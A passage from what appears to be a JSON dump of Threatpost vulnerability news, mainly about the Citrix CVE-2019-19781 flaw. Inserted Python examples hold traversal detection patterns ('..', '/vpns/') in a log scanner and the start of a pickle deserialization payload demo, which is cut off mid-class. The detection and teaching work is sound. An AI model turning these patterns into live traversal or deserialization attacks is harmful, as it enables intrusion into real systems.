Census Hack Exposes Cybersecurity Failures", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-08-19T14:35:49", "id": "THREATPOST:816C2C5C3414F66AD1638248B7321FA1", "href": "https://threatpost.com/postmortem-on-u-s-census-hack-exposes-cybersecurity-failures/168814/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:25:54", "description": "Citrix has quickened its rollout of patches for a critical vulnerability ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) in the Citrix Application Delivery Controller (ADC) and Citrix Gateway products, on the heels of recent proof-of-concept exploits and skyrocketing exploitation attempts.\n\nSeveral versions of the products still remain unpatched \u2013 but they will be getting a patch sooner than they were slated to. While Citrix originally said some versions would get a patch Jan. 31, it has now also shortened that timeframe, saying fixes are forthcoming on Jan. 24 (Friday of this week).\n\nAlso, Citrix patched Citrix ADC and Citrix Gateway version 11.1 (with firmware update Refresh Build 11.1.63.15) and 12 (firmware update Refresh Build 12.0.63.13) on Jan. 19 \u2014 a day earlier than it had expected to.\n\nThe versions that Citrix expects to patch on Jan. 
24 include Citrix ADC and Citrix Gateway version 10.5 (with Refresh Build 10.5.70.x), 12.1 (Refresh Build 12.1.55.x), 13 (Refresh Build 13.0.47.x), as well as Citrix SD-WAN WANOP Release 10.2.6 (with Citrix ADC Release 11.1.51.615) and Citrix SD-WAN WANOP Release 11.0.3 (Citrix ADC Release 11.1.51.615).\n\nWhen it was originally disclosed [in December](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>), the vulnerability did not have a patch, and Citrix [announced](<https://support.citrix.com/article/CTX267027>) it would not be issuing fixes for the gateway products and ADC (formerly called NetScaler ADC), a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web, until \u201clate January.\u201d\n\nHowever, in the following weeks after disclosure, various researchers published public [proof-of-concept (PoC) exploit code](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) for the flaw. At the same time, [researchers warned of active exploitations](<https://blog.rapid7.com/2020/01/17/active-exploitation-of-citrix-netscaler-cve-2019-19781-what-you-need-to-know/>), and [mass scanning activity](<https://twitter.com/bad_packets/status/1217234838446460929>), for the vulnerable Citrix products.\n\n> CVE-2019-19781 mass scanning activity from these hosts is still ongoing. 
<https://t.co/pK4Qus1eAo>\n> \n> \u2014 Bad Packets Report (@bad_packets) [January 14, 2020](<https://twitter.com/bad_packets/status/1217234838446460929?ref_src=twsrc%5Etfw>)\n\nIn one unique case of exploitation, [researchers at FireEye said last week](<https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html>) that a threat actor was targeting vulnerable Citrix devices with a previously-unseen payload, which they coined as \u201cNOTROBIN.\u201d\n\nResearchers said that the attack group behind the payload appeared to be scanning for vulnerable ADC devices and deploying their own malware on the devices, which would then delete any previously-installed malware. Researchers suspect that the threat actors may be trying to maintain their own backdoor access in compromised devices.\n\n\u201cUpon gaining access to a vulnerable NetScaler [ADC] device, this actor cleans up known malware and deploys NOTROBIN to block subsequent exploitation attempts! But all is not as it seems, as NOTROBIN maintains backdoor access for those who know a secret passphrase. FireEye believes that this actor may be quietly collecting access to NetScaler devices for a subsequent campaign,\u201d researchers said.\n\nWith patches now being available or soon to be rolled out, security experts urge customers to update as soon as possible.\n\n\u201cCISA strongly recommends users and administrators update Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP once the appropriate firmware updates become available,\u201d according to a Monday CISA alert on the patches. \u201cThe fixed builds can be downloaded from Citrix Downloads pages for [Citrix ADC](<https://www.citrix.com/downloads/citrix-adc/>) and [Citrix Gateway](<https://www.citrix.com/downloads/citrix-gateway/>). 
Until the appropriate update is accessible, users and administrators should apply Citrix\u2019s interim mitigation steps for CVE-2019-19781.\u201d\n", "cvss3": {}, "published": "2020-01-21T17:19:28", "type": "threatpost", "title": "Citrix Accelerates Patch Rollout For Critical RCE Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19781", "CVE-2020-5135"], "modified": "2020-01-21T17:19:28", "id": "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "href": "https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-08T12:00:56", "description": "A critical denial-of-service (DoS) vulnerability has been found in a Rockwell Automation industrial drive, which is a logic-controlled mechanical component used in industrial systems to manage industrial motors.\n\nThe vulnerability was identified in Rockwell Automation\u2019s PowerFlex 525 drive component, which is used in applications such as conveyors, fans, pumps and mixers. 
The drive offers a wide range of motor and software controls, from regulating volts per hertz to software used to manage EtherNet/IP networks.\n\nThe flaw, CVE-2018-19282, could be exploited to manipulate the drive\u2019s physical process and/or stop it, according to researchers with Applied Risk who found it. The vulnerability has a CVSS score of 9.1, making it critical, according to researchers.\n\n\u201cThis finding allows an attacker to crash the Common Industrial Protocol (CIP) in a way that it does not accept any new connection,\u201d Nicholas Merle, with Applied Risk, [wrote in a Thursday analysis](<https://applied-risk.com/application/files/4215/5385/2294/Advisory_AR2019004_Rockwell_Powerflex_525_Denial_of_Service.pdf>) (PDF). \u201cThe current connections however, are kept active, giving attackers complete control over the device.\u201d\n\nThe vulnerability is critical because it gives \u201ccomplete access to the device and DOS for the other users,\u201d an Applied Risk spokesperson told Threatpost. \u201cSo availability and integrity are impacted, with no confidentiality impact. Those are also the most important factors in OT environment.\u201d\n\nFor a variable frequency drive, which controls the speed of motors in a live production environment, that kind of shutdown could have a serious impact. There are no known public exploits that target this vulnerability, researchers said. Versions 5.001 and older of the software are affected.\n\nTo exploit the vulnerability, a bad actor could send a precise sequence of packets, effectively crashing the Common Industrial Protocol (the industrial protocol for industrial automation applications) network stack. 
An Applied Risk spokesperson told Threatpost that an attacker could be remote and wouldn\u2019t need to be authenticated.\n\nRockwell Automation PowerFlex 525\n\nThis creates an error in the control and configuration software, which crashes. After it crashes, it is not possible to initiate a new connection to the device, effectively preventing any legitimate user from recovering control, researchers said.\n\nIf the attacker keeps open the connection used to send the payload, they can continue sending commands as long as the connection is not interrupted, and the only way to recover access to the device is to do a power reset, researchers said.\n\n\u201cSending a specific UDP packet, a definite amount of time corrupts the\u2026 daemon forbidding any new connection to be initiated and disconnecting the configuration and control software from Rockwell Automation,\u201d said researchers.\n\nThe flaw was first discovered July 30, 2018 and has since been patched. Rockwell Automation did not respond to a request for comment from Threatpost.\n\nVulnerabilities are particularly insidious when they impact industrial control systems because of the high-risk implications. According to a [U.S. Department of Homeland Security bulletin](<https://ics-cert.us-cert.gov/advisories/ICSA-19-087-01>), the bug ([CVE-2018-19282](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-19282>)) is a threat to U.S. critical infrastructure. Downtime for these systems could pose dire monetary \u2013 and in some cases even life-threatening \u2013 risks.\n\nRockwell Automation isn\u2019t the only industrial control system manufacturer facing security woes. 
In [February](<https://threatpost.com/siemens-critical-remote-code-execution/141768/>), Siemens released 16 security advisories for various industrial control and utility products, including a warning for a critical flaw in the WibuKey digital rights management (DRM) solution that affects the SICAM 230 process control system.\n\nAnd in August, [Schneider Electric](<https://threatpost.com/high-severity-flaws-patched-in-schneider-electric-products/137034/>) released fixes for a slew of vulnerabilities that can be exploited remotely in two of its industrial control system products.\n", "cvss3": {}, "published": "2019-03-29T14:13:54", "type": "threatpost", "title": "Critical Rockwell Automation Bug in Drive Component Puts IIoT Plants at Risk", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-19282", "CVE-2019-19781"], "modified": "2019-03-29T14:13:54", "id": "THREATPOST:B956AABD7A9591A8F25851E15000B618", "href": "https://threatpost.com/critical-rockwell-automation-bug-in-drive-component-puts-iiot-plants-at-risk/143258/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-08T11:40:59", "description": "Adobe has issued an emergency patch for a critical vulnerability in its ColdFusion service that is being exploited in the wild.\n\nThe vulnerability, CVE-2019-7816, exists in Adobe\u2019s commercial rapid web application development platform, ColdFusion. The ColdFusion vulnerability is a file upload restriction bypass which could enable arbitrary code execution.\n\n\u201cAdobe has released security updates for ColdFusion versions 2018, 2016 and 11,\u201d according to the company\u2019s [security update](<https://helpx.adobe.com/security/products/coldfusion/apsb19-14.html>). 
\u201cThese updates resolve a critical vulnerability that could lead to arbitrary code execution in the context of the running ColdFusion service.\u201d\n\nThis attack requires the ability to upload executable code to a web-accessible directory, and then execute that code via an HTTP request, so restricting requests to directories where uploaded files are stored will mitigate the attack, Adobe said.\n\nImpacted are ColdFusion 2018, update 2 and earlier; ColdFusion 2016, update 9 and earlier; and ColdFusion 11, update 17 and earlier versions. The security update has a priority 1 rating, meaning that it resolves vulnerabilities being targeted by exploits in the wild.\n\n\u201cAdobe recommends administrators install the update as soon as possible (for example, within 72 hours),\u201d according to the company\u2019s priority update [page](<https://helpx.adobe.com/security/severity-ratings.html>).\n\nCharlie Arehart, Moshe Ruzin, Josh Ford, Jason Solarek, and the Bridge Catalog Team were credited with discovering the vulnerability.\n\nOne of these researchers, Charlie Arehart, told Threatpost that he is still in discussions with Adobe PSIRT about what can be publicly released. In the meantime, no further details about the vulnerability or subsequent exploits have been released.\n\nThe emergency update comes a week after a separate [unscheduled Adobe update](<https://threatpost.com/adobe-re-patches-critical-acrobat-reader-flaw/142098/>), which fixed a critical zero-day vulnerability in Acrobat Reader. The zero-day vulnerability in Adobe Reader, disclosed by Alex Infuhr from cure53 in a Jan. 
26 post, enabled bad actors to steal victims\u2019 hashed password values, known as \u201cNTLM hashes.\u201d\n", "cvss3": {}, "published": "2019-03-01T20:22:43", "type": "threatpost", "title": "Adobe Patches Critical ColdFusion Vulnerability With Active Exploit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19781", "CVE-2019-7816"], "modified": "2019-03-01T20:22:43", "id": "THREATPOST:63D2355B6EF0B975846E034876BC66DF", "href": "https://threatpost.com/adobe-patches-critical-coldfusion-vulnerability-with-active-exploit/142391/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:27:01", "description": "Digital workspace and enterprise networks vendor Citrix has announced a critical vulnerability in the Citrix Application Delivery Controller (ADC) and Citrix Gateway. If exploited, it could allow unauthenticated attackers to gain remote access to a company\u2019s local network and carry out arbitrary code execution.\n\nThe Citrix products (formerly the NetScaler ADC and Gateway) are used for application-aware traffic management and secure remote access, respectively, and are installed in at least 80,000 companies in 158 countries, according to Mikhail Klyuchnikov, a researcher at Positive Technologies. The U.S. accounts for about 38 percent of vulnerable organizations.\n\n\u201cThis attack does not require access to any accounts, and therefore can be performed by any external attacker,\u201d he noted in research released on Tuesday. 
\u201cThis vulnerability allows any unauthorized attacker to not only access published applications, but also attack other resources of the company\u2019s internal network from the Citrix server.\u201d\n\nWhile neither Citrix nor Positive Technologies released technical details on the bug ([CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)), they said it affects all supported versions of the product, and all supported platforms, including Citrix ADC and Citrix Gateway 13.0, Citrix ADC and NetScaler Gateway 12.1, Citrix ADC and NetScaler Gateway 12.0, Citrix ADC and NetScaler Gateway 11.1, and also Citrix NetScaler ADC and NetScaler Gateway 10.5, according to the research.\n\n\u201cCitrix applications are widely used in corporate networks,\u201d said Dmitry Serebryannikov, director of the security audit department at Positive Technologies, in a statement. \u201cThis includes their use for providing terminal access of employees to internal company applications from any device via the internet. Considering the high risk brought by the discovered vulnerability, and how widespread Citrix software is in the business community, we recommend information security professionals take immediate steps to mitigate the threat.\u201d\n\nCitrix released a [set of measures](<https://support.citrix.com/article/CTX267679>) to mitigate the vulnerability, including software updates, according to the researchers.\n\nThe vendor [made security news](<https://threatpost.com/citrix-confirms-password-spraying-heist/146641/>) earlier this year when cyberattackers used password-spraying techniques to make off with 6TB of internal documents and other data. 
The attackers intermittently accessed Citrix\u2019 infrastructure between October 13, 2018 and March 8, the company said, and the crooks \u201cprincipally stole business documents and files from a company shared network drive that has been used to store current and historical business documents, as well as a drive associated with a web-based tool used in our consulting practice.\u201d\n\nPassword-spraying is a related type of attack to brute-forcing and credential-stuffing. Instead of trying a large number of passwords against a single account, in password-spraying the adversary will try a single commonly used password (such as \u201c123456\u201d) against many accounts. If unsuccessful, a second password will be tried, and so on until accounts are cracked. This \u201clow and slow\u201d method is used to avoid account lock-outs stemming from too many failed login attempts.\n\nIn the case of Citrix, which has always specialized in federated architectures, the FBI surmised in March that the attackers likely gained a foothold with limited access, and then worked to circumvent additional layers of security. 
That was backed up by evidence that the attackers were trying to pivot to other areas of the infrastructure.\n", "cvss3": {}, "published": "2019-12-26T19:17:55", "type": "threatpost", "title": "Critical Citrix Bug Puts 80,000 Corporate LANs at Risk", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19781", "CVE-2020-5135"], "modified": "2019-12-26T19:17:55", "id": "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "href": "https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-08T11:40:52", "description": "SAN FRANCISCO \u2013 A previously unknown bug in Microsoft Office has been spotted being actively exploited in the wild; it can be used to bypass security solutions and sandboxes, according to findings released at the RSA Conference 2019.\n\nThe bug exists in the OLE file format and the way it\u2019s handled in Microsoft Word, said researchers from Mimecast. They noted that the OLE32.dll library incorrectly handles integer overflows.\n\nMicrosoft told the researchers that patching the problem is on the back burner.\n\nThe flaw allows attackers to hide exploits in weaponized Word documents in a way that won\u2019t trigger most antivirus solutions, the researchers said. In a recent spam campaign observed by Mimecast, attached Word attachments contained a hidden exploit for an older vulnerability in Microsoft Equation Editor (CVE-2017-11882). On unpatched systems, the exploit unfolded to drop a new variant of Java JACKSBOT, a remote access backdoor that infects its target only if Java is installed.\n\nJACKSBOT is capable of taking complete control of the compromised system. 
It has full-service espionage capabilities, including the ability to collect keystrokes; steal cached passwords and grab data from web forms; take screenshots; take pictures and record video from a webcam; record sound from the microphone; transfer files; collect general system and user information; steal keys for cryptocurrency wallets; manage SMS for Android devices; and steal VPN certificates.\n\n\u201cThe thing that stands out for me is that the attackers behind this were keen on using the Equation exploit, probably because they found it more reliable than others, and they then worked out a bypass to allow this to go through undetected,\u201d Meni Farjon, chief scientist for advanced threat detection at Mimecast, told Threatpost. \u201cThis process of chaining these two, a code-execution exploit and a flaw which leads to a bypass, is somewhat unique and we don\u2019t see many of these in data-format exploits.\u201d\n\n## The Flaw in Depth\n\nAn Object Linking and Embedding (OLE) Compound File essentially acts as an underlying file system for information and objects present in a Microsoft Word document. It contains streams of data that are treated like individual files embedded within the OLE file itself. Each stream has a name (for example, the top-level stream of a document is straightforwardly named \u201cWordDocument\u201d). 
Streams can also contain information on macros in the document and the metadata of a document (e.g., title, author, creation date).\n\nMimecast said that according to the format specifications for the Compound File Binary File Format, the OLE stream header contains a table called DIFAT, which is made up of an array of numbers that includes section IDs and some special numbers \u2013 it\u2019s here that the problem resides.\n\n\u201cTo access the sector N in the table, its offset is computed using the following formula: sector size * (sector ID + 1), when sector ID is DIFAT[N],\u201d the researchers explained in findings. \u201cIt seems that when a big sector ID exists, [this formula] leads to an integer-overflow that results in a relatively small offset. Because the result is more than 32 bits (integer overflow), only the lowest 32 bits will be the product when the code above performs the calculation. In other words, the calculated offset will be 0x200 = 512.\u201d\n\nThe system sees an impossible offset, according to the researchers; this can lead it to crash or, at the very least, ignore the section, including any exploit that may be hiding there.\n\n\u201cThis behavior is not documented by Microsoft, but it can confuse high-level parsers, which will not notice the overflow,\u201d Mimecast said.\n\n## In the Wild\n\nMimecast researchers said that they\u2019ve seen several attacks in the last few months that chain together the CVE-2017-11882 exploit with the OLE flaw, which has been successful, they said, in amplifying the attack to make it go undetected.\n\n\u201cOur systems were able to spot an attacker group, which seems to originate from Serbia, using specially crafted Microsoft Word documents\u2026in a way which caused the attacks to circumvent many security solutions designed to protect data from infestation,\u201d Mimecast said. 
The firm didn\u2019t specify which security solutions they\u2019re referring to.\n\n\u201c[With] this chaining of the older exploit with this integer overflow, Microsoft Office Word mishandles this error. It ignores the higher bytes of the OLE sector ID, loading the malicious object ([CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>)) into memory while not following the correct guidelines,\u201d the researchers said.\n\nFarjon told Threatpost that although the newly found issue is being used in the wild, \u201cexploiting this is not an easy task, as it requires deep format understanding.\u201d It\u2019s the difficulty in execution that is likely behind Microsoft\u2019s decision to not immediately patch the problem, he said.\n\n## Microsoft Response\n\nDespite evidence that the flaw is being actively exploited to great effect in the wild, the Microsoft Security Response Center told Mimecast that it will not be fixing OLE with a security patch anytime soon, because the issue by itself does not result in memory corruption and thus doesn\u2019t meet the security bar for an immediate fix.\n\n\u201cWhat Microsoft said is that they won\u2019t be fixing it right now, but perhaps they will on a later undefined date,\u201d Farjon told Threatpost.\n\nHe added, \u201cThey said it is an unintended behavior, but at the same time that it is not important enough to fix right now. Realistically, Microsoft needs to prioritize their work on patches, so their decision makes sense. That being said, it\u2019s up to security professionals to make sure their systems are as up to date as possible and that they are leveraging the threat intelligence they need to better manage today\u2019s evolving threats.\u201d\n\nThe researcher also offered a bottom-line assessment: \u201cAnalyzing all possible outcomes of such flaw is a tough task,\u201d he said. 
\u201cMimecast worked with the Microsoft Security Response Center and they did analyze all possible outcomes, and came to the conclusion that it didn\u2019t result in memory corruption. So, while it may not be severe, having another tool for attackers to bypass security solutions is not a good thing.\u201d\n\nThreatpost reached out to the computing giant for comments on the findings, and received a short statement: \u201cThe bug submitted did not meet the severity bar for servicing via a security update,\u201d said a Microsoft spokesperson.\n", "cvss3": {}, "published": "2019-03-05T11:00:03", "type": "threatpost", "title": "RSAC 2019: Microsoft Zero-Day Allows Exploits to Sneak Past Sandboxes", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2019-19781"], "modified": "2019-03-05T11:00:03", "id": "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "href": "https://threatpost.com/zero-day-exploit-microsoft/142327/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:31:10", "description": "About one in five of the 80,000 companies affected by a critical bug in the Citrix Application Delivery Controller (ADC) and Citrix Gateway are still at risk from a trivial attack on their internal operations.\n\nIf exploited, the flaw could allow unauthenticated attackers to gain remote access to a company\u2019s local network and carry out arbitrary code-execution. 
Researchers told Threatpost that other attacks are also possible, including denial-of-service (DoS) campaigns, data theft, lateral infiltration to other parts of the corporate infrastructure, and phishing.\n\nAccording to an assessment from Positive Technologies, which disclosed the software vulnerability in December (tracked as [CVE-2019-19781](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>)), 19 percent of vulnerable organizations in 158 countries have yet to patch. The U.S. originally accounted for 38 percent of all vulnerable organizations; about 21 percent of those are still running vulnerable instances of the products as of this week, PT said.\n\nThe Citrix products (formerly the NetScaler ADC and Gateway) are used for application-aware traffic management and secure remote access, respectively.\n\n\u201cPatching this bug should be an urgent priority for all remaining companies affected,\u201d said Mikhail Klyuchnikov, an expert at PT who discovered the flaw, speaking to Threatpost. \u201cThe critical vulnerability allows attackers to obtain direct access to the company\u2019s local network from the internet. This attack does not require access to any accounts, and therefore can be performed by any external attacker.\u201d\n\nHe added, \u201cThe flaw is really easy to exploit. It\u2019s also very reliable.\u201d\n\nSince Citrix is mainly used for giving remote access to applications in companies\u2019 internal networks, Klyuchnikov told Threatpost that a compromise could easily be used as a foothold to move laterally across a victim organization.\n\n\u201cThe critical information about applications accessible by Citrix can be leaked,\u201d he explained. 
\u201cThat could possibly include information (and possibly credentials) about internal web applications, corporate applications, remote desktops and other applications available through the Citrix Gateway.\u201d\n\nAttackers also could gain the ability to read configuration files, he said; these contain sensitive information like user credentials, yet more information about the internal network, and credentials for internal services (LDAP, RADIUS and so on).\n\n\u201cDepending on system settings, attackers can get administrative credentials for the Citrix Gateway, credentials (login, password, etc.) of company employees and credentials of other services used in Citrix Gateway [from the configuration files],\u201d he said.\n\nAdding insult to injury, various other kinds of attacks are possible as well.\n\n\u201c[An attacker] can conduct DoS attacks against Citrix Gateway, just deleting its critical files,\u201d the researcher explained to Threatpost. \u201cIt can lead to unavailability of the login page of Citrix application. Thus, no one (e.g. company employees) can get access into internal network using Citrix gateway. In other words, the Citrix gateway application will cease to do its main task for which it was installed.\u201d\n\nIt\u2019s also possible to conduct phishing attacks. For example, a hacker can change the login page so that the entered username and password are obtained by the attacker as clear text.\n\nAnd then there\u2019s the remote code-execution danger: \u201cAn attacker can use a compromised application as part of a botnet or for cryptocurrency mining. And of course, it can place malicious files in this application,\u201d Klyuchnikov noted.\n\nIn-the-wild attacks could be imminent: On January 8, a researcher [released an exploit](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) that allows a potential attacker to perform automated attacks. 
Others followed.\n\nhttps://twitter.com/GossiTheDog/status/1214892555306971138\n\nCitrix did not disclose many details about the vulnerability [in its security advisory](<https://support.citrix.com/article/CTX267027>); however, Qualys researchers last month said that the mitigation steps offered by the vendor suggest the flaw stems from the VPN handler failing to sufficiently sanitize user-supplied inputs.\n\nAccording to PT, the countries with the greatest numbers of vulnerable companies are led by Brazil (43 percent of all companies where the vulnerability was originally detected), China (39 percent), Russia (35 percent), France (34 percent), Italy (33 percent) and Spain (25 percent). The USA, Great Britain, and Australia each stand at 21 percent of companies still using vulnerable devices without any protection measures.\n\nLast month, Citrix [issued patches](<https://support.citrix.com/article/CTX267027>) for several product versions to fix the issue, [ahead of schedule](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>).\n\n\u201cConsidering how long this vulnerability has been around (since the first vulnerable version of the software was released in 2014), detecting potential exploitation of this vulnerability (and, therefore, infrastructure compromise) retrospectively becomes just as important [as patching],\u201d Klyuchnikov said.\n\nHe added, \u201cI think it\u2019s easy to apply the patch, as there is already a regular update for the hardware that fixes the vulnerability. Nothing should get in the way, as there is a full update from Citrix.\u201d\n
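Klyuchnikov's point about retrospective detection, as an added example in Python (not PT's, Citrix's or Qualys's code): a scanner over web access logs that percent-decodes each request path (repeatedly, so double-encoded dots are not missed), checks for `..` traversal segments, resolves where the path actually lands, and reports requests that either traverse or reach a watched handler prefix. The log lines are constructed in the common log format and are not real Citrix logs; the `/vpns/` prefix to watch is an assumption taken from Citrix's published mitigation for CVE-2019-19781, which blocks requests containing `/vpns/` together with `/../`, and the exact paths an attacker would request are not given on this page.

```python
import posixpath
import re
from urllib.parse import unquote

# Common log format: client, identd, user, [timestamp], "METHOD target proto", status, bytes.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3})'
)

# Assumption: handler prefixes worth watching, based on Citrix's published mitigation
# for CVE-2019-19781 (a responder policy keyed on "/vpns/" and "/../").
WATCHED_PREFIXES = ("/vpns/",)

# Constructed sample lines for demonstration only; not real Citrix ADC/Gateway logs.
SAMPLE_LOG = [
    '198.51.100.20 - - [20/Jan/2020:10:15:01 +0000] "GET /vpn/index.html HTTP/1.1" 200 1024',
    '198.51.100.20 - - [20/Jan/2020:10:15:03 +0000] "GET /logon/LogonPoint/index.html HTTP/1.1" 200 8810',
    '203.0.113.9 - - [20/Jan/2020:10:16:07 +0000] "POST /vpn/../vpns/example HTTP/1.1" 200 245',
    '203.0.113.9 - - [20/Jan/2020:10:16:09 +0000] "GET /vpn/%2e%2e/vpns/example.xml HTTP/1.1" 200 80',
    '203.0.113.9 - - [20/Jan/2020:10:16:11 +0000] "GET /vpn/%252e%252e/vpns/example.xml HTTP/1.1" 404 0',
]


def fully_decode(text, max_rounds=3):
    """Percent-decode repeatedly so %252e%252e (double-encoded "..") is seen as ".."."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def analyze_target(target):
    """Decode a request target and work out whether it traverses and where it resolves to."""
    raw_path = target.split("?", 1)[0]
    decoded = fully_decode(raw_path)
    return {
        "decoded": decoded,
        "traversal": ".." in decoded.split("/"),
        "resolved": posixpath.normpath(decoded),
    }


def scan_access_log(lines, watched_prefixes=WATCHED_PREFIXES):
    """Return one finding per request that traverses or resolves into a watched prefix."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = LOG_RE.match(line)
        if not match:
            continue  # not a request line we understand; a real tool would count these
        info = analyze_target(match.group("target"))
        reaches_watched = info["resolved"].startswith(watched_prefixes)
        if info["traversal"] or reaches_watched:
            findings.append({
                "line": lineno,
                "client": match.group("client"),
                "method": match.group("method"),
                "status": int(match.group("status")),
                "decoded": info["decoded"],
                "resolved": info["resolved"],
                "traversal": info["traversal"],
                "reaches_watched": reaches_watched,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

Two things the example is built to get right: matching on the decoded and resolved path rather than on the raw string, so `%2e%2e` and `%252e%252e` are caught alongside a literal `..`; and keeping the response status in the finding, since a traversal that was answered with 200 deserves a different follow-up from one the device rejected. Run it against the real access logs on the appliance, not this constructed sample.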
", "cvss3": {}, "published": "2020-02-07T15:32:52", "type": "threatpost", "title": "Critical Citrix RCE Flaw Still Threatens 1,000s of Corporate LANs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19781", "CVE-2020-5135"], "modified": "2020-02-07T15:32:52", "id": "THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "href": "https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:27:50", "description": "UPDATE\n\nA zero-day vulnerability has been disclosed in the IT help desk ManageEngine software made by Zoho Corp. The serious vulnerability enables an unauthenticated, remote attacker to launch attacks on affected systems. Zoho has now [released a security update](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) addressing the vulnerability.\n\nAs of Monday, March 9, the vulnerability has been observed being actively exploited in the wild, according to a [Center for Internet Security advisory](<https://www.cisecurity.org/advisory/a-vulnerability-in-manageengine-desktop-central-could-allow-for-remote-code-execution_2020-033/>).\n\nThe vulnerability, [first reported by ZDNet](<https://www.zdnet.com/article/zoho-zero-day-published-on-twitter/#ftag=RSSbaffb68>), exists in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. 
Steven Seeley of Source Incite [disclosed the flaw](<https://srcincite.io/advisories/src-2020-0011/>) on Twitter on Thursday, along with a proof of concept (PoC) exploit. According to ZDNet, the enterprise software development company will release a patch for the flaw on Friday.\n\n\u201cThis vulnerability allows remote attackers to execute arbitrary code on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability,\u201d according to Seeley.\n\nAccording to Seeley, the specific flaw exists within the FileStorage class of Desktop Central, which handles reading data from and writing data to a file. The issue results from improper validation of user-supplied data, which can result in deserialization of untrusted data.\n\nSeeley told Threatpost that an attacker can leverage this vulnerability to execute code under the context of SYSTEM, giving them \u201cfull control of the target machine\u2026 basically the worst it gets.\u201d\n\n> Since [@zoho](<https://twitter.com/zoho?ref_src=twsrc%5Etfw>) typically ignores researchers, I figured it was OK to share a ManageEngine Desktop Central zero-day exploit with everyone. UnCVE'ed, unpatched and unauthenticated RCE as SYSTEM/root. Enjoy!\n> \n> Advisory: <https://t.co/U9LZPp4l5o> \nExploit: <https://t.co/LtR75bhooy>\n> \n> \u2014 \u03fb\u0433_\u03fb\u03b5 (@steventseeley) [March 5, 2020](<https://twitter.com/steventseeley/status/1235635108498948096?ref_src=twsrc%5Etfw>)\n\nAccording to Seeley, who also posted a [PoC attack for the flaw on Twitter](<https://srcincite.io/pocs/src-2020-0011.py.txt>), the vulnerability ranks 9.8 out of 10.0 on the CVSS scale, making it critical in severity. 
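The bug class Seeley describes, deserialization of untrusted data, as an added example (not Zoho's code and not the Desktop Central FileStorage class, which is Java): Python's pickle is used here as a stand-in for any native object serializer, since it shows the same failure and the same control in a few lines. The vulnerable loader hands client-supplied bytes straight to the deserializer, so a blob whose `__reduce__` names a callable gets that callable run on load; the hardened loader subclasses `pickle.Unpickler` and resolves only an explicit allow-list of classes. The `_RecordHeader` class, the blob constants and the loader names are hypothetical; the payload calls `os.getcwd` only to prove that attacker-chosen code ran.

```python
import io
import os
import pickle

# The only globals the hardened loader will resolve. Everything else, including
# os.*, subprocess.* and builtins.eval, is refused before it is ever called.
ALLOWED_GLOBALS = {
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("collections", "OrderedDict"),
}


class _RecordHeader:
    """Stand-in for an attacker-controlled object (hypothetical).

    __reduce__ tells pickle to reconstruct this object by calling os.getcwd();
    a real payload would name os.system or similar.
    """
    def __reduce__(self):
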